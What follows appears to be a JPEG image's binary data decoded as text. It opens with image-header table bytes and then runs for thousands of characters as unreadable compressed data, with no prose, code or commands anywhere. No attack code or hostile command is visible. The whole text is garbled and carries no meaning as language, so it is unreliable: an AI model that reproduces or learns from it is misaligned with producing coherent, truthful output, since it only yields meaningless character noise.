 $.' ",#(7),01444'9=82<.342 C  2!!22222222222222222222222222222222222222222222222222  }|"        } !1AQa "q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz& !0`""a        w !1AQ aq"2B #3Rbr $4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz& !0`""a   ? HRjA <̒.9;r8 Sc*#k0a0 ZY 7/$ #'Ri'H/]< q_LW9c#5AG5#T8N38UJ1z]k{}ߩ)me&/lcBa8l S7(S `AI&L@3v, y cF0-Juh!{~?"=nqo~$ѻj]M >[?) ms~=*{7E5);6!,  0G K >a9$m$ds*+ Cc r{ ogf X~2v 8SВ~W5S*&atnݮ:%J{h[K }y~b6F8 9 1;ϡa{{u/[nJi- f=Ȯ8O!c H%N@<}qlu"a&xHm<*7"& #!|Ӧqfx"oN{F;`!q9vRqR?~8p)ܵRJ Q @Xy{*ORs~QaRqE65I 5+0y FKj}uwkϮj+z{kgx5(fnrFG8QjVVF)2 `vGLsVI,ݣa(`:L0e V+2h hs`iVS4SaۯsJ-밳Mw$Qd d }}Ʒ7"asA:rR.v@ jY%`5\ܲ2H׭*d_(ܻ#'X 0r1R>"2~9Ҳ}:XgVI?*!-N=3sϿ*{":4ahKG9G{M]+]˸ `mcϱy=y:)T&J>d$nz2 sn`ܫS;y }=px`M=i* ޲ 1}=qxj Qy`A,2ScR;wfT#`~ jaR59HVyA99?aQ vNq!C=:a#m#bY /(SRt Q~ Cɶ~ VB ~2ONOZrA Af^3\t_-ϦnJ[/|2#[!,O|sV/|IS$cFwt+zTayLPZ>#a ^r7d\u "3 83&DT S@rOW PSܣ[0};NRWk "VHl>Zܠnw :q׷el,44`;/I'pxaS";vixUuY1#:}T[{Kwi ma99 c#23ɫx-3iiW"~- yY"8|c-< S#30qmI"d cqf  #5PXW ty?ysvYUB(01 JǦ5%u'ewͮ{maܳ0!B0A~z{a{kc B ` ==}r Wh{xK% s9U@p7c}1WR^yY\ brp8'sֺk'K}"+l44?0I"ڳ.0d)@fPq׬F~ZY 3"BAF$SN  @(a lbW\vxNjZIF`6 ?! Nxҩҭ OxM{jqR 0 &yL%?y$"\p4:&u$aC$xo>TK@'y{~4KcC v}&y?]Ol|_; ϡRn r[mܡ}4D}:) $XxaY8i" !pJ"V^0 Rien% 8eeY,S =?E k"bi0ʶI=O:Sk>hKON9K2uPf*ny41l~}I~*E FSj%RP7U0Ul(D2z>a}X ƭ,~C<B6 2| HC#%:a7"Sa'ysK4!0R{szR5HC+=}ygn0c|SOA9kԮ}f"R#copIC~é :^eef # <3ֻxשƤ"ӽ94'_LOF90 &ܧܭS0R0#o8#R6y}73G^2~ox:##Sr=k41 r  zo 7"_=`0ld` qt+9?x%m,{.j;%h*:U}qfp}  g$*{XLI:"fB\BUzrRr#Ь +(Px:$SR~tk9ab! S#G'oUSGv4v} Sb{{)PҺ#Bܬ86GˏdTmV$gi&'r:1SSҠ" rP*I[N9_["#Kr.F*I?ts Thյ % =ଣa$|E"~GG O#,yϩ&~\\c1L2HQR :}9!`͐ɾF''yNp|=~D""vn2s~GL IUPUw-/mme] ? aZeki,q0c10PTpAg%zS߰2ĤU]`~I;px?_Z|^agD )~J0E]##o"NO09>"Sưpc`I}˯ JG~ +dcQj's&v6}ib %\r9gxuMg~x}0?*Wa^O*#  1wssRpTpU(u}`Ref  9bݿ 1FS999)e cs{'uOSܺ0fee6~yoƧ9"%f80(OOj&E T&%rKz?.;{aX!xeUd!x9t%wO_ocM- jHX_iK#*) ~@}{ ǽBd0Rn07 y@̢ 9?S ޫ>u'ʴu\"uW5֒HYtL B}GLZTg ܰ fb69\PP 緶;!3Ln]H8:@ S}>oޢ5%k:N ",xfpHbRL0 ~} e pF0'}=T0"!&zt9?F&yR`I #}J'76w`:q*2::ñޤ<  | 'F^q`gkqyxL; Rx?!Y7P}wn ·.KUٿGr4+ %EK/ uvzTp{{wEyvi 0X :}OS'aHKq*mF@\N:t^*sn }29T.\ @>7NFNRӷwEua'[c̐O`. Ps) gu5DUR;aF$`[CFZHUB M<9SRUFwv&#s$fLg8Q$q9Jez`R[' ?zﶥu3(MSs}0@9$&-ߦO"g`+n'k/ !$-1)ae2`g۰Z#r 9|ը}Iѭǻ1Bc.qR u`^սSmk}uzmSi<6{m}VUv3 SqRSԶ9{" bg@R Tqinl!1`+xq~:f ihjz&w"RI'9nSvmUۍ"I-_kK{ivimQ|o-~}j:`|ܨ qRR~yw@q%彶imoj0hF;8,:yuO'|;ڦR%:tF~ Ojߩa)ZVjkHf&#a'R\"Il`9dL9t"Ĭ7}:v /1`!n9!$ RqzRsF[In%f"R~ps9rzaRq6ۦ=0i+?HVRheIr:7f 8<+~[֬]poV%v pzg639{Rr81^{qo 92|ܬ}r=;zC*|+[zۣaS&쭬&C[ȼ3`RL9{j?KaWZVm6E}{X~? z~8ˢ 39~}~u-"cm9s kx]:[[yhw"BN v$ y9@" v[Ƽ* zSd~xvLTT"7j +tCP5:= /"ig#7ki' x9#}}ano!KDl('S?c_;`Ū3 9oW9g!Zk:p6[Uwxnq}qqFesS[;tj~]<:~!x,}V&"AP?&vIF8~SR̬`*:qxA-La-"i g|*px F:n~˯޼BRQC`5*]Q >:*D(cX( FL0`;5R|G#3`0+mѬn ޣ &0❬0 S&{t?ʯ(__`5XY[|Q `2:sO* <+:Mka&ij ƫ?Scun]I: 砯[&xn;6>}'`I0N}z5r\0s^Ml%M$F"jZek 2"Fq`~5+ҤQ G9 q=cᶡ/Ƥ[ iK """p;`tMt}+@dy3mՏzc0 yq~ 45[_]R{]UZp^[& Osz~I btΪ\yaU;Ct*IFF3`"c 1~YD&U \oRa !c[[G}P7 zn>3,=lUENR[_9 SJMyE}x,bpAdcRW9?[H$p"#^9O88zO=!Yy91 ڻM?M#C&nJp#~ G ekϵo_~xuΨQt۲:W6oyFQr $k9ڼs67\myFTK;[ld7ya` eY~q[&vMF}p3gW!8Vn:a/ ,i|R,`!W}1Ӿx~x XZG\vR~sӭ&{]Q~9ʡH~"5 -&U+g j~륢N=Jfd 9BfI nZ8wЮ~a=3x+/l`?"#8-S\pqTZXt%&#` ~{p{m>ycP0(R^} (y%m}kB1Ѯ,#Q)!o1T*}9y< b04H. 9`>}ga `~)\oBRaLSg$IZ~%8)Rcu9b%)S 4ֺ}Z/[H%v#x b t{gn=i%]ܧ! wSp V?5cb_`znxKJ=WT9qx"qzWUNN/O^xe|k{4V^~Gz|[31 rpjgn 0}k90ne+"VbrO]'0oxh`*!T$d/$~N>Wq&Z9O\1o&,-z ~^NCgN)ʩ70'_Eh u*K9.-v<h$W%~g-G~>ZIa+(aM #9l%c  xKGx|"O:8qcyNJyRTj&Omztj ?KaXLebt~A`GBA":g,h`q` e~+[YjWH?N>X<5ǩѼM8cܪX}^r?IrS"Zm:"57u&|" >[XHeS$Ryଠ:2|Df? ZPDC(x0|R;Ms Vi,͹:xi`,GAlVFY:=29n~@yW~eN ]_Go'}э_ЯR66!: gFM~q; eX<#%A0R } G&x&?ZƱkeR Knz`9j%@qR[-$u&9zOJKad"[jײc;&B(g<9nȯGxP.fF}P 31 R}<3a~ 2xV Dr \:}#S}HI\OKuI (GW 񳹸2:9%_3N|0}y lMZT [/9 n3 Mòdd^.}:BNp>czí Y%-*9ܭhRcd,. V`e n/=9xGQKx|b`D@2R 8'} }+D&"R}r22 Ƿs]x9%<({e:Hqǽ`}Ka9ı< ~ O#%iKKlF)'I+(`Sd` "c^ i\hBaq}:W|F BReax-sʬ:W<%$ %CD%Iʤ&Ra0}nxoW0ey'Ża2r# ۰A^9Q=5.(M$~V=SFNW H~kR9+~;khIm9aJ_Z"6 a>a<%2nbQ`\tU 9k15uCL$ݹp P1=Os^uEJx5zy:j:k OcnW;boz{~Vơaa5ksJ@?1{$=ks^nR)XN1OJxFh R"}?xSac*FSi;7~׫3 pw0<%~ P+^ Ye}CR/>>"m~&&>M[h [}"d&RO@3^(ʽ*QZy 1V}?O4Rh6R a3߷ =mR/90CI:c}s۾"xЬˢW$"{PG xZ1R0xE9+ ^rE`70l@.' }zN3U<3*? "c=p '1"kJ H'x+ oN9 d~c+jJz7(W]""?n괺6wN"Z`~:|??-E&®V$~X/& xL7pz^tY78Ue# #r=sU/EjRC4mxNݴ9 u:V ZIcr1xpzsfV9`qLI?\~ChOOmtעxZ}?S#b-X7 g~zzb3Sm*qvsM=w}&ڪ^׵(! ֵen QYSLSNk!/n00vRwSa9-V`[$`(9cq_@Bq`捭0;79?w<|k1 һlnrPNa&} ~-_O'0`!R%]%b1' X՝OR9+*"0O `uaӫ9ԥSy.ox x&(STݽ]Nr3~["veIGlq=M|gsxI6 ]ZΪ,zR}~#`F"iqcD>S G}1^+ i;Vi-Z]ܮ` b٥_/y(@qg W0.: 6 r>QR0+zb+I0TbN"$~)69{0V27SWWccXyKZc'iQLaW`xS\`źʸ&|V|!G[[ 3OrPY=15T~я 64/?Z~k}o፾}3]8濴n}a_6pS)2?WڥiWd}q{*1rXRd&m0cd"J# ,df8Nh;=7pn 6J~O2^S J:6ܷ0!wbO P=:-&} ` 9 r9ϧz> X75XkrѢL 7w}xNHR:2 +uN/'~h!nReQ6Q Ew|Yq1uyz8 `;6i<'[íZhu g>r`x}b2k꣧o~:hTW4|ki"xQ6Ln0 {e#27@^.1NSy e Q=̩B8<Scc> .Fr:~G=k,^!F~ ,}% "rGSYd?aY49PyU !~xm|/NܼPcT,/=Fk|u&{m]۾P>X޽i 0'6߼( !z^:S|,_&a]uѵ4jb~xƩ:,[ = R Y?}ڼ?x,1دv&@q Sz8Xz~"j=} ~h@'hF#p?xQ-lvpxcx&lxG·0L%y?-y`l7>q2A?"F}c!jB:J +Qv=Vu[Qml%R7aIT}x ? a7 1 -Ll}0O=up"3ҶW/!|w}w^qa M8Q?0IEhaX"`a ?!Q!R~q}~O`I0 Jy|!@99>8+u&! ʰ<6Iz S)Z_POw*nm=>Jh]&@nTR6IT ^Fx73!ַa$ 5Io:ȪmY[80*x"k+\ Ho}l"k, c{Z\ Q pz}3} JXOh٥LdR`6G^^[bYRʻd}4  2,; CQĴcmV{W\xx,MRl-n~ ?#}"SҥWN;~)"S9cLj뵿ūikiX7yny} t`V's$9:{wEk c$.~k}AprѢ!`lSs90IÝw&ef"pR9g}Tl} NkUK0Up ^ȥ{Hp`bqϩ^: }' Mz+5x('C$_I?^'z~+-}*?.x^1}My¸&L7&' bqG]˪1$oR8`.q}s־C98cvSfuַ _ۺxר:גxP-/mnQG`Rq=>nr!h`+;3<۩axx*Vtiwi |cRϮ3ֽ̰0 QroZѫO൯w8;k: x ;Ja;9R+g}|I{o2ʲ9 029L\0xb "Bv$&#i>=f N >NXW~5\0^(w2}X$ e888^n^ 9Q~7 DCѵs9W6!2\:?(#'$GJW\ 0E"g;Pv Nsx"}/:t+]JM*"^Ud|0M923"6H^&1oE.7*Htp{g<+cpby=8_skB\j""[9Pb9B& =93LaaXdP.0\0?"J" "S+=@9<AQ׻աxk",J$S}xZWH"UQ ]Xg< ߨg3-qe0*R$ܒ S8}_/e'+-Ӷ[sk%x0-peCr ϒ~=a(QWd\. \F0M>grq+SNHO  ܥݭnJ|P6Kc=Is} Ga)a=#vK:oKٍ&R[sټˏ" pwqSR 9!KS&vD A9 Rq} $SnIV[]}A |k|E Mu R.Idk}yvc iUSZ&zn*j-ɭ/SH\y5 ۠"0 xnz#ԯ, eŴ'c&<ݬ<S`kâna8=ʪ[x"pN02zK8.(v2@ ~xfuyUWa|:%Q^[|o5ZY"^{96Yv*x>_|UִtM9P## z/0-įdd,:p03S{9=+ ![!#="յjHh:[{?.u_%ccA }0x9>~9,ah2 Ary$VN ]=$} #1dMax!^!Kk FN8+{Ҽo[MRoe[_m/k.kg}xsSӴ`zKo0cPC9Y0#^9x˷`09;=aAkNBlcF 2Ҭ]K$ܮ"/H$ fO贵jN̿ xNFdhT9}A>qStһ\ȶc3@#I W.<ѬaA ; q2q $# ! !}9=;Ru+ϥe+$娯'+ZH4qFV9gR208)б>M|¾"i9Jd"O;sr+)DRaF*3d {zwQU~f ~>I+Rq`3Sf]STn4_*5azGC,+1òOcSb2y;cգh:`rNBk gxaX/hx*Tn = 2|(e$ x!'y+S=Y:i -BK":ơ&v-Y=Onjyf4T P`S7={m/ ZK&GbG AS*ÿ IoINU8Rw; 1Y "E Oyto/8~#ñl2f'h?CYd:qӷeĩ RL+~A3g=aRt3 QREw_;haSir ^i!|ROmJ/$lӿ [` >cF61 z7Ldxw9AXO"hm"NT I$pG~:bWS|n>Ϣܢ"%qL^ KpNA< &==ffF!yc $=ϭY]eDH>x_TP"a0ch['7a!?wn5u|c{O1"xsZ&y32  ~AcO45-fR. s~"Ҿ"wo\lxP Xc S5q/>#~Wif$\3 }<9H" ( : 8=+ꨬUAT]{msF0\}&BO}+:x1 ,v ~IZ0ǧ"3 20p9~)Zoq/L Rm}9[#\Bs [; g2SV/[u /a} =xHx." Qxh#a$'u<`:>2>+LSiwF1!eg`S }Vv $|,szΒxD\Rm o| :{Ӷn!0l, ( RR crsa,49MOH!@ }`9w;At0&.클5,u-cKӣ̺U.L0&%2"~x [`cnH}y"keRF{(ة `J#}wg<:;M ^\yhX!vBzrF?B/s<B)۱ w5:se{mѤh]Wm4W4bC3r$ pw`dzt!y`IhM)!edRm'>?wzKcRq6fp$)wUl`ARAgr:Rg[iYs5GK=FMG ``KɦuOQ!R/G`@qzd/(K%}bM x>RRVIY~#"@8 Sgq54v[(q c!FGa? UWZ$y}zק?>"6{""}.$`US& ' r$1(y7 V<~:  Mw'bxb7g~,iF8½k/{!2S/?:$eSRIRg9czrrNObi Ѻ/$,;R vxb" nmxn}3G,.٣u r`[<!@:c9Zh M5-q}G9 ;A-~v^ONxE}PO&e[]Gp /˷81~@B*8@p"8Q~H'8I-% F6U|ڸ ^w`K1K,}ddl0PkG&Uw};y[Zs"["6 Vq,# 8ryA::,c66˴'?t}H--":|Ƭ[  7#99$,+qS\ cy^ݸa"B-9%׮9Vw~vTꢷ%" [x"2gS?6 9#a@bTC*3BA9 =U"2l0iIc2@%94'HԾ@ Tpax::5eMw:_+a3yv " 1Gȫ#  p JvaDE: NFr2qxAau"#Ħ822/[Tr;q`z*(0 ;T:; Skޭ8U{^IZwkXZo_oȡ R2S SVa DRsx|2 [9zs{wnmCO+ GO8e`^G5f{X~,k0< y"vo I=S19)R#;Anc}:t#TkB.0R-Zgum}fJ+#2P~i%S3P*YA}2r:iRUQq0H9!={~ J}Vײm.ߺiYlkgLrT" &wH6`34e &L"%clyîA0 ~$[3u"pNO=  c{rYK ~F "a"Lr1ӯ2<"C".fջ~-g4{[r}xlqpwǻ8rF \c}-gycirw#o95afxfGusJ S/LtT7w,l ɳ;e෨RsgTS^ '~9:+kZd*[ܫ%Rk0}X$k#Ȩ P2bvx"b)m$*8LE8'N y+{uI'wva4fr=u sFlV$ Hс$ =}] :}+"mRlT#nki _T7θd\8=y}R{x]Z#r#H6 Fkr;s.&;s 9HSaխtU-n | vqS{gRtS.P9}0_[;mޭZRX{+"-7!G"9~nrYXp S!ӭoP̏t (0޹s#GLanJ!T#?p}xIn#y'q@r[J&qP}:7^0yWa_79oa #q0{mSyR{v޶eХ̮jR ":b+J y"]d OL9-Rc'SڲejP  qdВjPpa` <iWNsmvz5:Rs\u